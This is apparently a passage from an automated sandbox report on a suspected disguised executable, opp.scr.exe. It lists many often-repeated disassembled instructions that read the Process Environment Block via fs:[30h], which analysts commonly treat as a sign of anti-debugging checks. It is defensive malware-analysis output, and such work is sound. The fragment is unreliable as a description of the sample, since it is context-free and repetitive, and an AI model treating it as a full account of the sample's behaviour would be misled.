          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C44B0 mov ecx, dword ptr fs:[00000030h]1_2_016C44B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0174A49A mov eax, dword ptr fs:[00000030h]1_2_0174A49A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698770 mov eax, dword ptr fs:[00000030h]1_2_01698770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0770 mov eax, dword ptr fs:[00000030h]1_2_016A0770
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C674D mov esi, dword ptr fs:[00000030h]1_2_016C674D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C674D mov eax, dword ptr fs:[00000030h]1_2_016C674D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C674D mov eax, dword ptr fs:[00000030h]1_2_016C674D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01714755 mov eax, dword ptr fs:[00000030h]1_2_01714755
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171E75D mov eax, dword ptr fs:[00000030h]1_2_0171E75D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690750 mov eax, dword ptr fs:[00000030h]1_2_01690750
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2750 mov eax, dword ptr fs:[00000030h]1_2_016D2750
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2750 mov eax, dword ptr fs:[00000030h]1_2_016D2750
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170C730 mov eax, dword ptr fs:[00000030h]1_2_0170C730
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC720 mov eax, dword ptr fs:[00000030h]1_2_016CC720
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC720 mov eax, dword ptr fs:[00000030h]1_2_016CC720
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C273C mov eax, dword ptr fs:[00000030h]1_2_016C273C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C273C mov ecx, dword ptr fs:[00000030h]1_2_016C273C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C273C mov eax, dword ptr fs:[00000030h]1_2_016C273C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC700 mov eax, dword ptr fs:[00000030h]1_2_016CC700
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690710 mov eax, dword ptr fs:[00000030h]1_2_01690710
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C0710 mov eax, dword ptr fs:[00000030h]1_2_016C0710
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B27ED mov eax, dword ptr fs:[00000030h]1_2_016B27ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B27ED mov eax, dword ptr fs:[00000030h]1_2_016B27ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B27ED mov eax, dword ptr fs:[00000030h]1_2_016B27ED
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171E7E1 mov eax, dword ptr fs:[00000030h]1_2_0171E7E1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016947FB mov eax, dword ptr fs:[00000030h]1_2_016947FB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016947FB mov eax, dword ptr fs:[00000030h]1_2_016947FB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169C7C0 mov eax, dword ptr fs:[00000030h]1_2_0169C7C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017107C3 mov eax, dword ptr fs:[00000030h]1_2_017107C3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016907AF mov eax, dword ptr fs:[00000030h]1_2_016907AF
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017447A0 mov eax, dword ptr fs:[00000030h]1_2_017447A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173678E mov eax, dword ptr fs:[00000030h]1_2_0173678E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA660 mov eax, dword ptr fs:[00000030h]1_2_016CA660
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA660 mov eax, dword ptr fs:[00000030h]1_2_016CA660
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C2674 mov eax, dword ptr fs:[00000030h]1_2_016C2674
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175866E mov eax, dword ptr fs:[00000030h]1_2_0175866E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175866E mov eax, dword ptr fs:[00000030h]1_2_0175866E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AC640 mov eax, dword ptr fs:[00000030h]1_2_016AC640
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169262C mov eax, dword ptr fs:[00000030h]1_2_0169262C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C6620 mov eax, dword ptr fs:[00000030h]1_2_016C6620
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C8620 mov eax, dword ptr fs:[00000030h]1_2_016C8620
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016AE627 mov eax, dword ptr fs:[00000030h]1_2_016AE627
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A260B mov eax, dword ptr fs:[00000030h]1_2_016A260B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D2619 mov eax, dword ptr fs:[00000030h]1_2_016D2619
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E609 mov eax, dword ptr fs:[00000030h]1_2_0170E609
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017106F1 mov eax, dword ptr fs:[00000030h]1_2_017106F1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017106F1 mov eax, dword ptr fs:[00000030h]1_2_017106F1
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E6F2 mov eax, dword ptr fs:[00000030h]1_2_0170E6F2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E6F2 mov eax, dword ptr fs:[00000030h]1_2_0170E6F2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E6F2 mov eax, dword ptr fs:[00000030h]1_2_0170E6F2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E6F2 mov eax, dword ptr fs:[00000030h]1_2_0170E6F2
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA6C7 mov ebx, dword ptr fs:[00000030h]1_2_016CA6C7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA6C7 mov eax, dword ptr fs:[00000030h]1_2_016CA6C7
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC6A6 mov eax, dword ptr fs:[00000030h]1_2_016CC6A6
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C66B0 mov eax, dword ptr fs:[00000030h]1_2_016C66B0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694690 mov eax, dword ptr fs:[00000030h]1_2_01694690
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694690 mov eax, dword ptr fs:[00000030h]1_2_01694690
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D096E mov eax, dword ptr fs:[00000030h]1_2_016D096E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D096E mov edx, dword ptr fs:[00000030h]1_2_016D096E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016D096E mov eax, dword ptr fs:[00000030h]1_2_016D096E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B6962 mov eax, dword ptr fs:[00000030h]1_2_016B6962
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B6962 mov eax, dword ptr fs:[00000030h]1_2_016B6962
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B6962 mov eax, dword ptr fs:[00000030h]1_2_016B6962
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01734978 mov eax, dword ptr fs:[00000030h]1_2_01734978
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01734978 mov eax, dword ptr fs:[00000030h]1_2_01734978
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171C97C mov eax, dword ptr fs:[00000030h]1_2_0171C97C
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764940 mov eax, dword ptr fs:[00000030h]1_2_01764940
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01710946 mov eax, dword ptr fs:[00000030h]1_2_01710946
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0172892B mov eax, dword ptr fs:[00000030h]1_2_0172892B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171892A mov eax, dword ptr fs:[00000030h]1_2_0171892A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171C912 mov eax, dword ptr fs:[00000030h]1_2_0171C912
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688918 mov eax, dword ptr fs:[00000030h]1_2_01688918
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688918 mov eax, dword ptr fs:[00000030h]1_2_01688918
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E908 mov eax, dword ptr fs:[00000030h]1_2_0170E908
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170E908 mov eax, dword ptr fs:[00000030h]1_2_0170E908
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171E9E0 mov eax, dword ptr fs:[00000030h]1_2_0171E9E0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C29F9 mov eax, dword ptr fs:[00000030h]1_2_016C29F9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C29F9 mov eax, dword ptr fs:[00000030h]1_2_016C29F9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175A9D3 mov eax, dword ptr fs:[00000030h]1_2_0175A9D3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017269C0 mov eax, dword ptr fs:[00000030h]1_2_017269C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0169A9D0 mov eax, dword ptr fs:[00000030h]1_2_0169A9D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C49D0 mov eax, dword ptr fs:[00000030h]1_2_016C49D0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017189B3 mov esi, dword ptr fs:[00000030h]1_2_017189B3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017189B3 mov eax, dword ptr fs:[00000030h]1_2_017189B3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017189B3 mov eax, dword ptr fs:[00000030h]1_2_017189B3
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016909AD mov eax, dword ptr fs:[00000030h]1_2_016909AD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016909AD mov eax, dword ptr fs:[00000030h]1_2_016909AD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A29A0 mov eax, dword ptr fs:[00000030h]1_2_016A29A0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726870 mov eax, dword ptr fs:[00000030h]1_2_01726870
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726870 mov eax, dword ptr fs:[00000030h]1_2_01726870
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171E872 mov eax, dword ptr fs:[00000030h]1_2_0171E872
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171E872 mov eax, dword ptr fs:[00000030h]1_2_0171E872
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A2840 mov ecx, dword ptr fs:[00000030h]1_2_016A2840
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694859 mov eax, dword ptr fs:[00000030h]1_2_01694859
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01694859 mov eax, dword ptr fs:[00000030h]1_2_01694859
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C0854 mov eax, dword ptr fs:[00000030h]1_2_016C0854
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173483A mov eax, dword ptr fs:[00000030h]1_2_0173483A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173483A mov eax, dword ptr fs:[00000030h]1_2_0173483A
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CA830 mov eax, dword ptr fs:[00000030h]1_2_016CA830
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov eax, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov eax, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov eax, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov ecx, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov eax, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B2835 mov eax, dword ptr fs:[00000030h]1_2_016B2835
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171C810 mov eax, dword ptr fs:[00000030h]1_2_0171C810
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175A8E4 mov eax, dword ptr fs:[00000030h]1_2_0175A8E4
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC8F9 mov eax, dword ptr fs:[00000030h]1_2_016CC8F9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CC8F9 mov eax, dword ptr fs:[00000030h]1_2_016CC8F9
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BE8C0 mov eax, dword ptr fs:[00000030h]1_2_016BE8C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_017608C0 mov eax, dword ptr fs:[00000030h]1_2_017608C0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171C89D mov eax, dword ptr fs:[00000030h]1_2_0171C89D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690887 mov eax, dword ptr fs:[00000030h]1_2_01690887
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0168CB7E mov eax, dword ptr fs:[00000030h]1_2_0168CB7E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01762B57 mov eax, dword ptr fs:[00000030h]1_2_01762B57
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01762B57 mov eax, dword ptr fs:[00000030h]1_2_01762B57
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01762B57 mov eax, dword ptr fs:[00000030h]1_2_01762B57
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01762B57 mov eax, dword ptr fs:[00000030h]1_2_01762B57
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173EB50 mov eax, dword ptr fs:[00000030h]1_2_0173EB50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01738B42 mov eax, dword ptr fs:[00000030h]1_2_01738B42
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726B40 mov eax, dword ptr fs:[00000030h]1_2_01726B40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01726B40 mov eax, dword ptr fs:[00000030h]1_2_01726B40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0175AB40 mov eax, dword ptr fs:[00000030h]1_2_0175AB40
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01688B50 mov eax, dword ptr fs:[00000030h]1_2_01688B50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01744B4B mov eax, dword ptr fs:[00000030h]1_2_01744B4B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01744B4B mov eax, dword ptr fs:[00000030h]1_2_01744B4B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BEB20 mov eax, dword ptr fs:[00000030h]1_2_016BEB20
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BEB20 mov eax, dword ptr fs:[00000030h]1_2_016BEB20
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01758B28 mov eax, dword ptr fs:[00000030h]1_2_01758B28
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01758B28 mov eax, dword ptr fs:[00000030h]1_2_01758B28
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170EB1D mov eax, dword ptr fs:[00000030h]1_2_0170EB1D
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01764B00 mov eax, dword ptr fs:[00000030h]1_2_01764B00
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171CBF0 mov eax, dword ptr fs:[00000030h]1_2_0171CBF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BEBFC mov eax, dword ptr fs:[00000030h]1_2_016BEBFC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698BF0 mov eax, dword ptr fs:[00000030h]1_2_01698BF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698BF0 mov eax, dword ptr fs:[00000030h]1_2_01698BF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698BF0 mov eax, dword ptr fs:[00000030h]1_2_01698BF0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B0BCB mov eax, dword ptr fs:[00000030h]1_2_016B0BCB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B0BCB mov eax, dword ptr fs:[00000030h]1_2_016B0BCB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B0BCB mov eax, dword ptr fs:[00000030h]1_2_016B0BCB
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173EBD0 mov eax, dword ptr fs:[00000030h]1_2_0173EBD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690BCD mov eax, dword ptr fs:[00000030h]1_2_01690BCD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690BCD mov eax, dword ptr fs:[00000030h]1_2_01690BCD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690BCD mov eax, dword ptr fs:[00000030h]1_2_01690BCD
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01744BB0 mov eax, dword ptr fs:[00000030h]1_2_01744BB0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01744BB0 mov eax, dword ptr fs:[00000030h]1_2_01744BB0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0BBE mov eax, dword ptr fs:[00000030h]1_2_016A0BBE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0BBE mov eax, dword ptr fs:[00000030h]1_2_016A0BBE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170CA72 mov eax, dword ptr fs:[00000030h]1_2_0170CA72
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0170CA72 mov eax, dword ptr fs:[00000030h]1_2_0170CA72
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CCA6F mov eax, dword ptr fs:[00000030h]1_2_016CCA6F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CCA6F mov eax, dword ptr fs:[00000030h]1_2_016CCA6F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CCA6F mov eax, dword ptr fs:[00000030h]1_2_016CCA6F
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0173EA60 mov eax, dword ptr fs:[00000030h]1_2_0173EA60
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0A5B mov eax, dword ptr fs:[00000030h]1_2_016A0A5B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016A0A5B mov eax, dword ptr fs:[00000030h]1_2_016A0A5B
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01696A50 mov eax, dword ptr fs:[00000030h]1_2_01696A50
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016BEA2E mov eax, dword ptr fs:[00000030h]1_2_016BEA2E
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CCA24 mov eax, dword ptr fs:[00000030h]1_2_016CCA24
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CCA38 mov eax, dword ptr fs:[00000030h]1_2_016CCA38
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B4A35 mov eax, dword ptr fs:[00000030h]1_2_016B4A35
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016B4A35 mov eax, dword ptr fs:[00000030h]1_2_016B4A35
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_0171CA11 mov eax, dword ptr fs:[00000030h]1_2_0171CA11
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CAAEE mov eax, dword ptr fs:[00000030h]1_2_016CAAEE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016CAAEE mov eax, dword ptr fs:[00000030h]1_2_016CAAEE
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E6ACC mov eax, dword ptr fs:[00000030h]1_2_016E6ACC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E6ACC mov eax, dword ptr fs:[00000030h]1_2_016E6ACC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016E6ACC mov eax, dword ptr fs:[00000030h]1_2_016E6ACC
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01690AD0 mov eax, dword ptr fs:[00000030h]1_2_01690AD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C4AD0 mov eax, dword ptr fs:[00000030h]1_2_016C4AD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_016C4AD0 mov eax, dword ptr fs:[00000030h]1_2_016C4AD0
          Source: C:\Users\user\Desktop\opp.scr.exeCode function: 1_2_01698AA0 mov eax, dword ptr fs:[00000030h]1_2_01698AA0
